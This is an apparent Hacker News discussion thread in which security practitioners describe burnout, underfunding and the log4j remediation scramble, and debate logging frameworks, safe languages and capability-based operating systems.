Companies have let developers do whatever they want for so long, that when infosec comes in and says we need to change this so we have better visibility in to what is being used, or how, it's "Oh this will hurt productivity, so no".

The shit I have heard because companies don't want to spend money on cybersecurity, because putting out new features is more important than something that "might" happen. They just keep spending more on endpoint security and letting everything inside do whatever it wants.

and why would they? Bad hacks blow over after a year or two. Equifax is still ticking along, so is Citi bank, so is capital one. Nobody cares if you get hacked, just pay a fine and give it some time and things will go back to normal.


The only truly new thing in the last year is that it's in the news. The reality was always full of breaches and security holes. The paragraph you quote is mostly just inflating the issue in a typical journalistic manner.


This is somewhat of a bottleneck moment; a lot happening demanding constant attention from the frontline yet budgets & resources are still reasonably bad all around.

Saying bottleneck implies there's expectation of a better future ahead, but so far there's very few repercussions for neglecting this stuff and so it's unclear whether it'll improve or just become worse.


In my experience of almost a decade in infosec now, no, we're not okay. I don't know any other group where so many people are struggling with burnout or who have developed a drinking habit because of their jobs. Might be selection bias, but this industry eats people alive, more so than others.


"Organizations are now in a race against time to figure out if they have computers running the vulnerable software that were exposed to the internet."

Large orgs should already have sufficient documentation as to which packages and versions are in use and what systems pulled them from their proxy repo.


> Large orgs should already have sufficient documentation as to which packages and versions are in use and what systems pulled them from their proxy repo.

Key word there: "should".

Let's say you have all your 50,000 applications well-documented. You think those docs are all going to be searchable in one place? That's an information disclosure vulnerability! No, all 50,000 applications documentation will be silo'd and only accessible to a select few people who work on them (you hope).

So now something like the log4j vulnerability crops up: You need to find out which systems are using log4j and what version. Best you can do is ask around... Demand that every application team cough up the details ASAP.

Now let's say you get data (emails) back suggesting that 5,000 applications are using log4j for certain, 1,000 may be using it (they're Java based apps), and you've confirmed that 14,000 most certainly are not using it. That leaves 30,000 applications where you have no idea if they're vulnerable.

You get data from the Artifactory ("proxy repo") team and they tell you, "we have 150,000 servers that have pulled down log4j (various versions)." Well, that's not particularly helpful so you get the raw data and try to correlate servers to applications only to find that's not helpful either: Because multiple "applications" could be using the same server and just because a log4j version was pulled doesn't mean it's actually being used by anything (in production).

After a few days of investigating the issue you find out that some thousands of applications actually are using log4j but it was included as part of a dependency. You tell them to update it.

Then you find out that 10,000 applications at present have no active development teams which explains why you got no response. Then there's an ungodly number of applications where no one has access to the source code anymore, 3rd party applications, etc.

So even if you have a central proxy repo and excellent documentation on all your stuff that doesn't mean it's going to be easy to hunt down and patch everything (that needs to be patched).


Pretty sure the various organizations within the enterprise had an individual responsible for their domain. At worst, it's a bit bucket search within ones org/domain for the library. The testing is the more complicated part.

It's not an easy situation either way, but the identification portion should be trivial.


Depends on how the organization grew, and if they have unified processes across department.

AFAIK the IT security folks at a financial institution that I used to work at are living in hell at the moment. That organization grew internationally through acquisitions across more than 80 countries, and lacks unified structure across the entire organization due to legal and compliance constraints unique to each jurisdiction.

A web development shop I provide security guidance to (owned by one my TTRPG buddies) had to do a couple of searches in github and update some hardware as patches became available. We made sure he was sorted out over a couple of drinks before we played board games.

It varies.


That does sound like a nightmare.


Sure. We have a codebase and app stack that has grown over 40 years. Responsible Parties have come and gone, sometimes handing off ownership responsibly, but often there wasn't enough time. So someone may be "responsible" for application X, but they haven't looked at the code in any detail. Or application X was installed by a vendor who provided documentation back in 2002 that is long gone.

Nothing is trivial in large organizations.


I mean, we could say nothing is ever trivial, period.


I'm not technically a cybersecurity person, but yeah I'm working through the holidays to make sure a portfolio of container images, vsphere templates, amis, openstack glance images, anywhere log4j can be hiding, is cleaned out or revved up. I'm getting despondent and was really looking forward to the first mental break this year. I'm bad at pushing back, and don't get anything personal out of playing a martyr. I'm good enough at my job to be the person who has to fix it on Christmas, not important enough to be the person who has to fix it on Christmas.

I know I'll see half of y'all online with me :-/


Entry level, on average, churns out in 1yr. Other reasons for that too, but it's not a carefree job. I love helping the analysts using us, but gets frustrating seeing how many are treated.

Developers make products: they are indirect profit centers, and while everyone sees room for improvement, get treated relatively well.

Conversely, outside of areas like say finance, big tech, & gov, sec teams get starved and ignored as cost centers. Their event log DBs (SIEMs) are often from 15+ years ago and might even be SQL-based (think MySQL, not bigquery), if they even have one.

Not fun even before all this - automated attacks with bad support has been going on for years.


I'm not a cybersecurity worker (although I would like to be) and I would with them. There's been a lot of activity but I wouldn't say they're more stressed than normal. We did have some log4j stuff but to my knowledge weren't affected by the exchange server or solarwinds exploits. News companies are generally going to exaggerate and use hyperbolic language to make things seem as exciting as possible "organizations are now in a race against time" in order to get more clicks.


I reckon the scale is simply not linear.

The likes of FAANG or banks, they have a big target painted on their backs; so they are scrambling for cover. However, the overwhelming majority of other businesses are not under similar pressure, because it's unlikely they will be targeted first - if at all.

I was actually talking about this with a friend who works for a company that provides a few niche services. They've had log4j 1.x in production for eons, which is also vulnerable to bad remote exploits, and nothing ever happened - simply because hackers are extremely unlikely to target their services. Obviously it doesn't mean they shouldn't upgrade, but the pressure is basically not there - at least until something Really Bad actually happens. He was actually pissed off at his manager making a big deal out of this exploit simply because it ended up on the mainstream press.


True. And some apps using log4j2 might escape any user input in a way that they can use the flawed versions and be safe. I believe there is just one theoretical exploit of 1.x known that relates to its socket server. It isn't supported anymore and 2.x is recommended, but I wouldn't call it a security flaw if you use it.



Infosec emotional climate always had a certain pessimistic, paranoid and panicky perception from the outside, but it is greatly exaggerated, I think.

FUD, bullshit, lack of skilled people, lack of budgets, lack of understanding from adjacent departments, chaos, mayhem, overtimes, incidents and creeping "I'm not sure what's going on" have always been parts of the profession. Learning to accept frustration, constant change, ill-formed perception and rejection is part of your career choice and a selection factor in the long term. Learning to look at the world from a certain angle which is hard to unlearn (especially if you're good at it) is a mental equivalent of firefighter's calluses.

If you can bear with it all - being on defensive side and being a kind of digital first responder (regardless of where exactly you are in the industry) is a fun job and calling for some.

(Edits: Typos)


I would say that security ops (SOC and Vuln mgmt in particular) at a small/medium sized company has to be kind of awful all the time. There is never enough time, funding, or management support to make meaningful change. This is further exacerbated by the fact that once you get a headcount or two, it can be exceptionally difficult to find qualified people (and those people are expensive). I did this type of work for 5ish years, and while I would never trade the experience for anything, I am glad to have moved past that point in my career.

Now, I write software for a niche Information Security team at a Fortune 250. I am still impacted by these major events, but it is usually in the form of "can we add X detection for Y vulnerability". The work is challenging/enjoyable but I am still able to maintain a good work/life balance.


I think the industry really f'ed themselves on not developing pipelines to onboard security staff when the shortage of professionals first became acknowledged years ago. Look at this research report from over 10 years ago discussing it as a problem[1].

Yet here we are, talking about burnout with more than a few people ITT _still_ talking about teams being understaffed.

Meanwhile there is no shortage of people obtaining credentials and education in cybersecurity who have nowhere to go because many parties feel these are effectively worthless. So what's the answer when the onus of training has shifted to workers, but none of the major players want to develop these people.

[1] https://www.csis.org/analysis/human-capital-crisis-cybersecu...


We have an open source PHP application and we’ve been fielding dozens of questions asking if the app is vulnerable - even from IT managers / system admins who in my mind, should know better.

This has me thinking no one cares anymore about the stack of software being used - it’s almost sad to think about how it is going to be get worse with insane dependencies software comes with nowadays.

I’m thinking there’s a business opportunity for someone to curate list of software and it’s dependencies and provide subscription service for vulnerabilities alert on the stack of said software.

PS: Looks like Vuldb [0] is halfway there, but wonder if they alert based on dependencies or even version of said application / product.

[0] https://vuldb.com/?kb.alerting


I left cybersecurity, specifically application security, because it felt like screaming into a void with no one listening. Well, once in a while the void would scream back about deadlines and deny problems exist. It was very demoralizing to work hard to not only identify vulnerabilities but also to filter out false positives and come up with remediation and education plans to correct and prevent future vulnerabilities only to have that work ignored and tossed aside. As security debt grew and grew, I myself grew concerned that if a breach happened, my purpose would be to be the fall guy despite the amount of evidence I had showing I did my job but was ignored. So I left and am looking for a new path, probably in data visualization.


I used to work at a Cyber security company but now switched jobs after. Personally I don't identify that much with the matter although I always took security seriously and developed my own approach. Still people then frame me as cyber security guy which has been particularly weird with friends who would constantly mention this and ask me about hacking. At work having no formal certifications I have limited leverage anyway but I'm often shocked how poorly security matters are being dealt with. I left my last job, so I enjoy watching from my sofa right now.


It really depends on where you work.

At my previous job, everything fell on deaf ears and I wasn't given access to the things I needed to make sure things were secure. I couldn't access Jira board for the projects I was supposed to secure to create tickets for security remediations, and issue reports were ignored.

Where I'm at now is better. I can create the tickets, but they tend to get ignored until I tag the PM for them to get assigned, after which they typically get fixed pretty quickly.


Depending on what your job role is, this last weekend probably sucked. But IMO it's also pretty typical that a few of these sorts of events happen every year.

Reminder that this exists: https://paulbellamy.com/vulnerability-name-generator


- It's not my fault: check - I'm busy: check - Making money: check

At some point we need to stop the coddling. Sink or swim people.

¯\_(ツ)_/¯


> With so many large scale hacks, 0-days, and breaches happening these days, are cybersecurity professionals ok?

As an industry? We are getting better. Better recognition for neurodiversity, and the needs and capabilities for each other. Better at calling out the bad actors who can be poison pills in our teams, companies, and communities. Better at mentoring folks who are coming up in the industry.

None of that changes the disastrous toll that the security industry can take on individuals. Incident responders and investigators often have to deal with many of the psychological issues that police officers have to (exposure to CSAM, graphic imagery, deep knowledge of cybercrime and the relationship to real world crime, including human trafficking, drug trafficking, etc). The stress of often working in sensitive roles where you can't share or talk about things, and in the case of many colleagues (at least in Canada and the United States), having access to work approved "counselling services" as opposed to actual mental health professionals with a direct clinician-patient relationship.

Many IT Security folks work in teams that are under resourced, function in "Teams" of one, and are often expected to fulfill the roles of SRE, IT Support, Architecture, Engineering, and Compliance for any technologies or tools they use to do their jobs, in addition to actually doing their jobs.

It gets to be a bit much at times :)

> Have studies about the mental health and anxiety levels of this group of professionals been conducted?

I don't know if there are any formal, rigorous, academic studies, but mental health in the cybersecurity space has been a long discussion, with the earliest significant discussions I remember being back in 2008-2009 at some conferences.

Depending on the role and the organization it can be a high stress job. I often tell a story at talks and conferences about my 72 hour work day, which was my first incident response activity early in my career. It involved life critical and personal safety systems affecting thousands of people, and ended up working with the team for literally 3 days straight with no sleep because there was no one else in our team that had the perspective on how to address the issues. There was serious physical fallout, as well as mental issues (I developed aphasia for a short period of time, amongst other things) Many of the folks I know in the industry have similar (but not as grim as a full 72 hours), and that's setting aside the toll of building a career on telling people that there are big issues, and having to be helpful and constructive instead of saying "I told you so..." when things go poorly.


Thanks for asking! Busy like a sailor with two dicks in a whore house, but hey, at least I still have a good job.


> With so many large scale hacks, 0-days, and breaches happening these days, are cybersecurity professionals ok? Have studies about the mental health and anxiety levels of this group of professionals been conducted?

Yes. Risk is the primary part of the job, and the job is lucrative.

In other words, it's business as usual.


Lots of pandemic downtime gave hackers and script kiddies more idle time to sharpen their tools and tricks, and more businesses going online gives a greater target vector (even though we only hear about the big ones getting hacked)


Well, I left it in early 2021 due to burnout, so... no, not really. The cybersecurity industry is not okay, in terms of mental health.

The major contributing factors for me:

- Reactive panic instead of proactive strategy

- - Detail: The suits in most economic sectors have zero interest in investing in security and best practice ahead of time, preferring to sell buzzwords to customers, and engaging in actual security only reactively. This leads to lots of scrambling and working weekends for cybersecurity professionals.

- - Example: can't tell you how many times I heard companies say "AWS handles our security." This is virtually never true, and the realization of the fallacy of this idea led to many panicked board meetings and embarrassing disclosures.

- Budget by buzzword

- - Detail: The latest cyber machine learning web 2.0 agile next gen thing will always get the funding, while tried and true practices like a good NIDS/HIPS pairing and a robust incident response process are relegated to the budget back seat

- - Example: Much of my time was for a government agency, and it was consistently easier to get funding for security hardware than for people. As a result, we often ended up with amazing, sexy, buzzword-covered hardware, and absolutely nobody (or nobody trained) to actually monitor it or analyze the data it produced.

- Ambulance-chasing parasites

- - Detail: Name a major cybersecurity incident that hit the public consciousness between 2015 and 2020, and I can name at least a dozen startups that cold called me over the next three months offering to address the problem for our organization, and prevent it the next time. These ambulance-chasing companies offer very little real value, and often drain resources from real improvements in an organization's cybersecurity posture.

- - Example: WannaCry/Eternal blue. I received months and months of aggressive marketing promising to fix this across our org, to the point that dodging the spam calls actually interfered with the on-the-ground work of patching endpoints and monitoring for IoCs.

This was my own experience, and may well not be representative of what others have gone through... but after years of 2am NOC calls, all-weekenders, being treated with disdain by other disciplines, and watching org funds consistently get flushed away on snake oil, I threw in the towel and switched industries. I took two decades of IT experience with me when I left. Now I'm paid better, and I'm in a much better place health-wise.


We have good security posture and a large ops team. We were unaffected by most of the large exploits this year. Print nightmare was a PITA but I agree with the other commenters that a lot of news is hyperbolic.


Perhaps, but this year been been objectively bad with regards to security issues even when fully patched.


There's tons of talks on burn out, mental health, its a common problem. That said its less stressful for me now in some respects then when I was purely on the ops side.


I would expect that a large portion of cybersecurity workers are far too busy trying to properly address Log4shell issues at their organizations to be posting on HN


Most of them wasting time remediating applications that can't be exploited.

If only we had sanitized our inputs.

We sanitized all the form parameters! Did you sanitize the user agent string? What.

This is one of the reasons why I avoid log4j and log4net like a real weirdo. People use a logging framework because they are supposed to--so we can send logs to something sensible instead of paying a billion dollars to suck files from an ec2 instance into Splunk. We use log4j and still spend a GDP on splunk sucking in files.

99% of these people running around with their hair on fire could have just wrote to a log file with three lines of code. Instead they mvn a whole fucking library for no reason.

Well, they were supposed to. It's the right thing to do, according to some blog posts.


> 99% of these people running around with their hair on fire could have just wrote to a log file with three lines of code. Instead they mvn a whole fucking library for no reason

The fact that you think there is "no reason" to address the issue of logging through a method other than writing three additional lines of code shows that you really have no comprehension of how or why logging frameworks provide benefits (even if some of the inclusions like JNDI are ludicrous and should been defaulted off, or even behind a build flag, with big red warning labels).


Of course I do. Just that 99% of the people wasting their life and money remediating this issue did not need any of that, certainly didn't use most of it, and definitely didn't need the features causing this mess.

I have yet to stumble on an app that uses any logging features other than writing to a file. And yet the default is to mvn log4j to do that because they don't want to look foolish doing it the simple way or "they might need it."


Congratulations! log4j is to feature rich to satisfy the requirements of your limited experience!

The JNDI string expansion and lookups was a pants on head stupid feature, but having highly configurable logging is super helpful when building and debugging systems at scale, both when you building and testing, and when you are scaling up so that you can granularly tune what is logging and where. This is true whether it's written in python, golang, rust, c, or any other language. If you don't know that, then perhaps you should try branching out in your experience.


Sanitizing inputs requires you to know what you're sanitizing against. Nobody knew about all these expressions that log4j would accept anywhere until a few weeks ago, so nobody could have sanitized them out of inputs.

Logging to a text file is nice for a toy app. For large-scale Production apps, you're gonna need log rotation to not overwhelm your disk space, transport to a centralized service for aggregation and bulk querying, and a good mechanism to append some tags about the request, service, instance etc to the log data to make it easy to query. That's not so easy without a nice logging framework.


> “Organizations are now in a race against time to figure out if they have computers running the vulnerable software”

As a client platform engineer for the last couple years, patch management / versioning is one of my primary job duties. Are there cybersecurity “professionals” out there enjoying hefty pay raises for doing a job someone at their organization is doing for them?

Perhaps I should change my job title to “Cybersecurity Analyst” and get a extra $30k per year for the same thing I’m already doing.


They are crying all the way to the bank.


Cybersecurity has always been an area that requires a particular intellectual mindset and emotional gutset. When I was consulting (~20 years), people how often said to me "that must be so satisfying!"

My stock answer was "yeah, well, it depends on the day: On a good day, you're saying the same thing to new people. On a bad day, you're saying the same thing to the same people."

Those repeat conversations were often after an incident. The <insert fairly senior to C suite executive title here> would ask "how could this have happened" and I would say something along the lines of "<sir/ma'am/Alice/Bob, as appropriate>, do you remember my presentation and report of about 6 months ago when I mentioned that X-Y-Z required remediation and both greater control depth and greater control strength? Q hit Y, which hadn't been remediated, and that's why we're here...".

IF you can report to a interested and motivated executive with pull and credibility and IF the organization has risk governance and understands its risk tolerance and IF people understand the differences in various degrees of injury and IF people understand the differences between mission-critical and mandate-vital OR people are at least willing to learn what these things are AND willing to put in place the structures that support analysis, remediation, continually, forever, THEN, yes, it can be very satisfying.

(I taught for CSE for a few years, from beginner-level intros to in-depth multi-day courses for SMEs. I almost always made sure to include in every deck that one slide that showed the relationship between law, enabling legislation, central policy, departmental policy, governance, and risk tolerance and management. I'd say something along the lines of "if your department/agency/organization/unit does NOT have this, then the first document you should prepare is your CV....)

As to me, I'm doing OK, because I joined a cyber startup 1.5 years ago. Our hardware product is a unidirectional gateway (think diode with extra management capabilities on either side), our software product is a wicked cool (if I do say so myself) IRM/GRC/ComplianceManagement engine with integrated visualization and workflow, so I get to do really cool stuff all the time. And fortunately, we aren't subject to this one, so no one lost their weekend. Well, not because of this.

But only OK, because a) plague, b) some of the lovely bonus situations that come with age (related to both one's health and the health of one's loved ones), and c) startup, with all that implies, especially with A and B. Fortunately, I have great colleagues and a fantastic boss, so that makes it easier, but, still, it's a lot.


not ok.

mid level Managers not being all that helpful since they have little understanding of our job. we are understaffed, underfunded.

high level managers, executives, continuing to push more unreasonable objective. targeting non sensual numbers such as 40% operational margin, and double digit growth.

HR more interested in us adhering to inclusive language at work and whatnot, than our mental well being and productivity.

our company threatening all employees for compliance with vaccine mandate in the US (for sure some employees will leave, causing further understaffed issues).

number of attacks on the rise, probably because more people stuck at home converting to being cyber criminals.

more politics at work, more junior engineers playing the politics game to shine rather than slowly sharpen their technical skills.

more engineers who do most of the work started to give up. simply logging in, attending meeting pretending to do all they can, but in fact do the minimum they can get away with. hence more pressure on those who haven't given up yet.

Cyber attacks have always been on the rise, and they will continue to rise in numbers as we continue to digitalise our lives, but during this last couple of years, I've seen a drastic descent into mismanagement, and increased employee pressure in order to increase profit, which led to the opposite result in absolute productivity.

I only expect things to get worse before they get better. Someone daring to make these remarks at the workplace could easily cost him his job, at least he would become ostracised by management for spreading negativity and exaggerations.

I don't think this is only happening in the cybersecurity industry, some people I know even outside of tech are telling me they witness similar trends.


It is true that overtime is nearly constant, personally I would compare it to Y2K happening every month. The rallying of staff is one thing but the repeated drumbeat of something hitting the fan in one part of the tech stack is transparently exhausting.

Heterogeneous tech stacks have benefits and drawbacks and we're seeing the drawbacks play our in real-time as increased risk.


As IT workers in general we have numerous advantages over most people.

First, we can work remote. Compare that to a fast food worker who has to risk exposure to feed their family.

Second, if you spend your money right you can say f it and leave any job that's too rough.

I was actually thinking of taking 6 months off, until I realized travel is still restricted


Remote probably hurts in a log4j situation. There's no separation between work and home. You are expected to be ready at the drop of a hat.


It doesn't hurt actually. During major incidents in my non-remote roles I was expected to be in the office and available for the duration of the active incident, even if I wasn't able to actively contribute (contrary to what folks may have seen on NCIS, having two people typing on the same keyboard is not actually helpful when fighting hackers :P )

As a remote worker I can be at home and present with my family, with short breaks for actual activity, and longer periods for active response. This is not speculation - I have been active on incident response in the last month while helping my kids with homework, side by side at my home office desk).


It's a fundamental and systemic problem.

We have a ton of software written in unsafe languages (C and C++). Our operating systems, web browsers, email readers, file editors, etc. Our governments and cyber-criminals have stock-piled 0-day exploits against these unsafe systems. They have hundreds or maybe thousands of these exploits.

On top of that businesses want features added to user-facing apps as fast as possible (beat the competition). These apps sit atop the unsafe C operating systems and often times run as root or Administrator. These apps have many logic flaws. Governments and criminals have stocked-piled 0 days against these flaws as well.

So until our systems and apps are re-written in safe languages (Go, Rust, C#. Java) and most processes run in an un-privileged context and mandatory access control (MAC) is applied to all running processes (all the time), we will continue to be hacked in ever-growing catastrophic ways.

IMO, this may be the explanation to the Fermi paradox. The aliens did themselves in with insecure software.


How many of those mitigations would've solved the log4j misfeature? It was in Java, there is an access control to turn off JNDI lookups (that was off for some stupid reason), etc.


A MAC in enforcing mode would have prevented it.


>We have a ton of software written in unsafe languages (C and C++).

That's one of the favorite stances to take here on HN, and is driving the adoption of .NET, Go, Rust, etc (as far as I, a mere Pascal programmer, can tell)

It is not, however the root cause of our cybersecurity woes. It's ignoring the principle of least privilege at all levels, especially that of the OS kernel.

Instead of trying to rewrite everything in a "perfect" language, it would be far wiser to redirect some of this effort towards adopting a microkernel/capability based OS such as Genode, Fuchsia, etc, there's a handy list at

https://en.wikipedia.org/wiki/Capability-based_operating_sys...




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: